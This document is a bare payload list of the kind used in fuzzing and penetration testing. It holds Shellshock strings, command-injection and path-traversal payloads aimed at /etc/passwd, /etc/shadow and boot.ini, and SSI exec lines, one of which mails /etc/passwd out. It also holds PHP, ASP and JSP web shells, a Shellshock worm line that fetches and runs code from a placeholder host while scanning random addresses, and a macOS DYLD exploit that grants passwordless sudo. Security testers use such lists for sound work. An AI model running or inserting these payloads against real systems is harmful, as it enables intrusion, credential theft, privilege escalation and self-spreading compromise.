() { 0; }; touch /tmp/blns.shellshock1.fail;
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
<<< %s(un='%s') = %u
'+++ATH0
/dev/null; touch /tmp/blns.fail ; echo
`touch /tmp/blns.fail`
$(touch /tmp/blns.fail)
@{[system "touch /tmp/blns.fail"]}
eval("puts 'hello world'")
System("ls -al /")
`ls -al /`
Kernel.exec("ls -al /")
Kernel.exit(1)
%x('ls -al /')
$HOME
$ENV{'HOME'}
File:///b'/../../../../file'
\\..\\..\\..\\..\\file'
\\../\\../\\../file'
/..\\/..\\file.txt'
/%c0%ae/WEB-INF/web.xml'
/webapp/WEB-INF./web.xml'
/.........................../../../../file'
/...........................\\..\\..\\..\\file'
/..//..//..//..//file'
/..///..///..///..///file'
/..\\\\..\\\\..\\\\..\\\\file'
/..\\\\\\..\\\\\\..\\\\\\file'
/./\\/././\\/./file'
/.\\/\\.\\.\\/\\.\\file'
/././././././././././././file'
/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\file'
/./.././.././../file'
/.\\..\\.\\..\\.\\..\\file'
/.//..//.//..//.//..//file'
/.\\\\..\\\\.\\\\..\\\\.\\..\\\\file'
/.//././/././/./boot.ini'
/../..//../..//file'
/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/dir%5C/file'
/..\\/..\\/..\\/..\\/..\\/..\\/..\\/file'
/.../.../.../.../.../file'
/..%2E/..%2E/..%2E/..%2E/..%2E/file'
/..%2F..%2F..%2F..%2Fetc/mtc'
/..%5c..%5C..%5Cfile'
/%2E%2E/%2E%2E/%2E%2E/etc/mtc'
/%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fmtc'
/..%252f..%252F..%252fetc/mtc'
/%252E%252E/%252E%252E/%252E%252E/etc/mtc'
/%252E%252E%252f%252E%252E%252f%252E%252E%252ffile'
/..%255c..%255c..%255cboot.ini'
/%252E%252E\\%252E%252E\\%252E%252E\\file'
/%2e%2e%5c%2e%2e%5c%2e%2e%5cfile'
/%252E%252E%255c%252E%252E%255c%252E%252E%255cfile.ini'
..%c0%af..%c0%af..%c0%affile'
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/file'
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%affile'
/..%25c0%25af..%25c0%25affile'
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/file'
/%25c0%25ae%25c0%25ae%25c0%25affile'
/..%c1%9c..%c1%9c\\file'
/%c0%ae%c0%ae\\%c0%ae%c0%ae\\file'
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cfile'
..%25c1%259c..%25c1%259cfile'
/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\file'
/%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cfile'
/..%%32%66..%%32%66..%%32%66file.ini'
%%32%65%%32%65/%%32%65%%32%65/file.ini'
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66file.ini'
/..%%35%63..%%35%63file'
/%%32%65%%32%65\\%%32%65%%32%65\\file'
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63file'
/%%32e%%32e%%32f%%32e%%32e%%32f%%32e%%32e%%32ffile'
/%2%65%2%65%2%66%2%65%2%65%2%66%2%65%2%65%2%66file'
/%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002ffile'
../../../file'
..%2f..%2f..%2ffile'
%2e%2e/%2e%2e/file'
%2e%2e%2f%2e%2e%2ffile'
../../../file%00'
.........................../../../../file'
...........................\\..\\..\\..\\file'
../../../../../filename/////[...]/////'
../../../../../file//////////////'
/../etc/./passwd%00'
/../etc/./passwd'
/showcode.php/C:Windows/aaa.txt'
file:///etc/hosts'
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4='
../etc/./hosts'
../../etc/././././hosts'
php://filter/read=convert.base64-encode/resource=index.php'
../../../../etc/aaa/../hosts'
../../../../etc/aaa/../aaa/bbb/../../hosts'
..////////////..////////////////..///////////////../etc//////////hosts'
../../../../etc/hosts/.'
/etc/passwd/./././././.'
/etc/hosts///////////'
http://localhost/aa.txt'
www.site.com/aa.txt'
;ls+-al;'
|+ping+|'
&&+ping'
%0a+ping+localhost+-i+3'
..%2F..%2F..%2Fbin/ls%20-al|'
..%c0%af..%c0%af../bin/ls%20-al|'
%31%3b%6c%73%20%2d%61%6c%3b'
%31%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%73%68%20%31%2e%31%2e%31%2e%31%20%33%33'
+|+Dir+c:\
$+|+Dir+c:\
%26%26+|+dir c:\
$%26%26dir c:\
%0a+dir+c:\
+|+Dir+c:%255c
$+|+Dir+c:%255c
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%0a+dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:%2f
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
<!--#exec cmd="/usr/bin/id"-->
<!--#exec cmd="id"-->
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0A/usr/bin/id%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
{cmd}
;{cmd}
;{cmd};
^{cmd}
|{cmd}
<{cmd}
<{cmd};
<{cmd}\n
<{cmd}%0D
<{cmd}%0A
&{cmd}
&{cmd}&
&&{cmd}
&&{cmd}&&
%0D{cmd}
%0D{cmd}%0D
%0A{cmd}
%0A{cmd}%0A
\n{cmd}
\n{cmd}\n
'{cmd}'
`{cmd}`
;{cmd}|
;{cmd}/n
|{cmd};
a);{cmd}
a;{cmd}
a);{cmd}
a;{cmd};
a);{cmd}|
FAIL||{cmd}
CMD=$'{cmd}';$CMD
;CMD=$'{cmd}';$CMD
^CMD=$'{cmd}';$CMD
|CMD=$'{cmd}';$CMD
&CMD=$'{cmd}';$CMD
&&CMD=$'{cmd}';$CMD
%0DCMD=$'{cmd}';$CMD
FAIL||CMD=$'{cmd}';$CMD
CMD=$\'{cmd}\';$CMD
;CMD=$\'{cmd}\';$CMD
^CMD=$\'{cmd}\';$CMD
|CMD=$\'{cmd}\';$CMD
&CMD=$\'{cmd}\';$CMD
&&CMD=$\'{cmd}\';$CMD
%0DCMD=$\'{cmd}\';$CMD
FAIL||CMD=$\'{cmd}\';$CMD
CMD=$"{cmd}";$CMD
;CMD=$"{cmd}";$CMD
^CMD=$"{cmd}";$CMD
|CMD=$"{cmd}";$CMD
&CMD=$"{cmd}";$CMD
&&CMD=$"{cmd}";$CMD
%0DCMD=$"{cmd}";$CMD
FAIL||CMD=$"{cmd}";$CMD
<!--#exec cmd="{cmd}"-->
;system('{cmd}')
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name . -print" --><br/>
<!--#exec cmd="mail Florian Roth @4nc4p <mailto:Florian Roth @4nc4p> < cat /etc/passwd" --><br/>
<% eval request("cmd") %> 
<?php system($_GET["cmd"]) ?> 
<% Runtime.getruntime().exec(request.getParameter("cmd")) %>
() {<svg onload="alert(1)"> {')' "(</svg>" {& }; echo -e "header\x3axss
env x='() { :;}; apt-get update && apt-get install --only-upgrade bash' bash -c "Oops."
s='() { .;};wget x.x.x.x/WORM;chmod +x WORM;./WORM';while true;do wget $[RANDOM%255].$[RANDOM%255].$[RANDOM%255].$[RANDOM%255] -U'$s';done
env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
foo='() { echo "hi mom"; }' bash -c 'foo'
Cookie: () { echo "Hello world"; }
() { :;}; /bin/bash -c \"wget http://a.b.c.d/bash-count.txt\"
echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su
strings /usr/lib/dyld | grep ^DYLD_ | sed -e 's/^/note to self: try exploiting /'
